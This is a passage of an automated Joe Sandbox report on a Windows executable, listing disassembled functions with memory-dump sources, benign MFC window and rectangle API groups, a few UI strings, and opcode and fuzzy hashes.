                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$InvalidateParentRectUpdate$CaptureDestroyMessageReleaseSend
                                                                            • String ID:
                                                                            • API String ID: 1969771063-0
                                                                            • Opcode ID: 30aa3b8aadeae635dbfc8a7d3a3334473b168250d9390e2a253fac4c006d257f
                                                                            • Instruction ID: 775c5d53d389d6c0fb6d693e1a8698fb1f8f3c81fdf125ad0c9daf954497ae5f
                                                                            • Opcode Fuzzy Hash: 30aa3b8aadeae635dbfc8a7d3a3334473b168250d9390e2a253fac4c006d257f
                                                                            • Instruction Fuzzy Hash: B3213A76710681E7EB599F62DA94BE97762F7C8B85F440026CB1A07B61CF3AD4B0C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014017872C Relevance: 9.1, APIs: 6, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2643385981-0
                                                                            • Opcode ID: 9be154b03619212b0101dc621ff628cb22f994f2980200fbea50d4c0a354a538
                                                                            • Instruction ID: ac51827701fd764177be95318d6162b630328ebe65fa6a58b1a862b2b79c425b
                                                                            • Opcode Fuzzy Hash: 9be154b03619212b0101dc621ff628cb22f994f2980200fbea50d4c0a354a538
                                                                            • Instruction Fuzzy Hash: D1115B35304A8082EB159B77A84979A2B61EBCDFD4F240125EF5A4BBAADF79C4428340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013A5FC Relevance: 9.0, APIs: 6, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRectUpdateWindow$MessageParentSend
                                                                            • String ID:
                                                                            • API String ID: 2428145105-0
                                                                            • Opcode ID: 16a7b4430fedf1a7eb0ead75f6cfd763863962ee087d9f2a813d83afff1984eb
                                                                            • Instruction ID: 2f1c8e14cecacba3216c2dfa6d13e30769fc3df09f2dc4393c6dfd873a4cf139
                                                                            • Opcode Fuzzy Hash: 16a7b4430fedf1a7eb0ead75f6cfd763863962ee087d9f2a813d83afff1984eb
                                                                            • Instruction Fuzzy Hash: 5B11C676210A40CAFB569F22D4597D92762E788F4DF480036CF494B6A5DFBAC494CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400D8768 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 229fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileTemp$CloseCreateHandleNamePath
                                                                            • String ID: AFX
                                                                            • API String ID: 777972874-1300893600
                                                                            • Opcode ID: 02a075713e5600bc9e496857cb8d623e35c581e7ffcecd3d9ad893c9455262b3
                                                                            • Instruction ID: b4af6e2f5f2ed9b6694fdddd401caebc387e987223ec55faf7c62fa3bc09c6dc
                                                                            • Opcode Fuzzy Hash: 02a075713e5600bc9e496857cb8d623e35c581e7ffcecd3d9ad893c9455262b3
                                                                            • Instruction Fuzzy Hash: CD91B036305B8082EB26DB27E9547EE6361FB89BE0F454112EF5997BA5DF38C442C710
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400D245C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 192windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ConditionMask$BeginClientFillFocusInflateInfoMetricsPaintSystemVerifyVersion
                                                                            • String ID: mmm
                                                                            • API String ID: 3577466532-1545505134
                                                                            • Opcode ID: 7bf4dc384aa7e58e3636fc023d1c28410872245aed83aa2680e2d560834b54ff
                                                                            • Instruction ID: d0f9ef6968ba506d253bd78c43bdef4d931b4ae190b69efb3532a78b46a417ec
                                                                            • Opcode Fuzzy Hash: 7bf4dc384aa7e58e3636fc023d1c28410872245aed83aa2680e2d560834b54ff
                                                                            • Instruction Fuzzy Hash: 89815936B00A4086EB12EB67E8547ED2361B789BE4F455226EF1E177A9CF78C846C344
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014007A5E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$ClientScreen$Copy_invalid_parameter_noinfo
                                                                            • String ID: Afx:ControlBar
                                                                            • API String ID: 3927728238-4244778371
                                                                            • Opcode ID: 816223470ace245a30309818a85f2d69389e16cf8f4d8a5036e5279ead35d17f
                                                                            • Instruction ID: cc9ae681fb7d4f1e9c9c9534fd62f57412c407aa89d6d4c1d00e5e82b4906268
                                                                            • Opcode Fuzzy Hash: 816223470ace245a30309818a85f2d69389e16cf8f4d8a5036e5279ead35d17f
                                                                            • Instruction Fuzzy Hash: 0671AB36B08A8085EB56DB66E9507ED23A0B78DBD8F044216EF4E57BA5DF3CC546C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016E200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$SendWindow$BeepEnableMenuRect
                                                                            • String ID: Can't create context menu!
                                                                            • API String ID: 1562889814-1189624947
                                                                            • Opcode ID: c36f13eff46cded1d42503c750121b5db58da9c3a0c56ecc679ddd691f81eb3b
                                                                            • Instruction ID: 4520086d6b640db351a3b47c8e4417bd59757a427008284a4f6923bdac60d8bf
                                                                            • Opcode Fuzzy Hash: c36f13eff46cded1d42503c750121b5db58da9c3a0c56ecc679ddd691f81eb3b
                                                                            • Instruction Fuzzy Hash: 21415A36310B4086EA669B27E855BDA67A1FB89BD0F084625DF5E07BA1DF78C4428600
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005061C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Edit
                                                                            • API String ID: 0-554135844
                                                                            • Opcode ID: 5fcd942c2c449602f160e59d8c868e5951446abe1fc943bf2870fa8964b1674b
                                                                            • Instruction ID: 7b2062d33fe734507c55a24570af3faac5c6c08620330ba4712d9015bc59d287
                                                                            • Opcode Fuzzy Hash: 5fcd942c2c449602f160e59d8c868e5951446abe1fc943bf2870fa8964b1674b
                                                                            • Instruction Fuzzy Hash: C521597230464196FF66DF23E5597ED22A1ABCCBC8F084025AB098B2F5DF79C8A1C301
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400644D0 Relevance: 7.8, APIs: 5, Instructions: 309windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 1632408287-0
                                                                            • Opcode ID: 0d62f86be1e52cadb593ef37dbb6b5f8ef82d4b69d19409ebb5df9cce1cf652d
                                                                            • Instruction ID: 4b659c918898a2a24d21657531c73e04ff6851355a5fbb362de9db5470d97057
                                                                            • Opcode Fuzzy Hash: 0d62f86be1e52cadb593ef37dbb6b5f8ef82d4b69d19409ebb5df9cce1cf652d
                                                                            • Instruction Fuzzy Hash: 0BD19A37700A8086EB16DF66D8447ED2362F749BE4F584026EF1967BA6DF78C845C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014010E084 Relevance: 7.8, APIs: 5, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Window$Intersect$EqualOffset
                                                                            • String ID:
                                                                            • API String ID: 1272538121-0
                                                                            • Opcode ID: 6e7f641fd03851c4b3e61d56e4774ab28a660d92ebcbe037032138a071de653b
                                                                            • Instruction ID: 6d2038105ffa2ccd6c6377c94f5fbd55f00b88979c2ee9193befd6f667561b0c
                                                                            • Opcode Fuzzy Hash: 6e7f641fd03851c4b3e61d56e4774ab28a660d92ebcbe037032138a071de653b
                                                                            • Instruction Fuzzy Hash: 07C18AB2714A418AEB12CB67D1847EE77B0F788FC8F141515AF865BEAADB38D405CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014015A7D4 Relevance: 7.8, APIs: 5, Instructions: 293COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Copy$Window
                                                                            • String ID:
                                                                            • API String ID: 1774135527-0
                                                                            • Opcode ID: c6b5a139d69254f4fc0802705462ba263c656d4e46ae06e5c3ad58fcb7fe958d
                                                                            • Instruction ID: 448c0490fb7eb8bc6c170a5e591b5225f2671c4dafe468a559ddf1f1baeea4cc
                                                                            • Opcode Fuzzy Hash: c6b5a139d69254f4fc0802705462ba263c656d4e46ae06e5c3ad58fcb7fe958d
                                                                            • Instruction Fuzzy Hash: B6C1BC72B10A508AEB16DF6AD448BDD33A5F788B98F5A4026DF095BBA9DF38C441C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016A364 Relevance: 7.7, APIs: 5, Instructions: 232windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ColorRect$ClientInflateMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1205032120-0
                                                                            • Opcode ID: 4f6cd9eb03f5a977121dc2fc3c7aea54792fb68003878ea3bf71023a51c796ff
                                                                            • Instruction ID: 10e1a4455d53fd7ef00d50a94dfdd91372b626ae88a70ef5d30b6a8df3ce8cd0
                                                                            • Opcode Fuzzy Hash: 4f6cd9eb03f5a977121dc2fc3c7aea54792fb68003878ea3bf71023a51c796ff
                                                                            • Instruction Fuzzy Hash: FCB16632A14B808BE705CB6AD8403EDB3B0F789B94F544226EF8953B68DF78D955CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140156084 Relevance: 7.7, APIs: 5, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientCountInflateTick
                                                                            • String ID:
                                                                            • API String ID: 2651408654-0
                                                                            • Opcode ID: 2b894734c67db45671a0e90fc3cb2e37796e42fd1d09e173b9723abb2ea4dc08
                                                                            • Instruction ID: 4c61a9033d6e7734dba6f25793ae737a122163ee509217289a6092ec5223f56e
                                                                            • Opcode Fuzzy Hash: 2b894734c67db45671a0e90fc3cb2e37796e42fd1d09e173b9723abb2ea4dc08
                                                                            • Instruction Fuzzy Hash: 4371B032700A9086EB52EB67D854BFD23A1BB8CFC4F494526DF199BBA5DE39C805C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400E220C Relevance: 7.7, APIs: 5, Instructions: 195COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$BackgroundDrawTheme$CreateIndirectInflateIntersect
                                                                            • String ID:
                                                                            • API String ID: 3293656562-0
                                                                            • Opcode ID: 1cb1560c5264d3c8ef91430b01d6d32b1d2453fe42969178187b7e291f9c19fd
                                                                            • Instruction ID: 5d472b05397f6db14a359a2f1a8cbed0c64297072bf11d979af9e84235577574
                                                                            • Opcode Fuzzy Hash: 1cb1560c5264d3c8ef91430b01d6d32b1d2453fe42969178187b7e291f9c19fd
                                                                            • Instruction Fuzzy Hash: 9581AB33B04A848AE721CFBAD444BED7372B75DB98F444215EF9963AA5EB34C585C380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014010E808 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
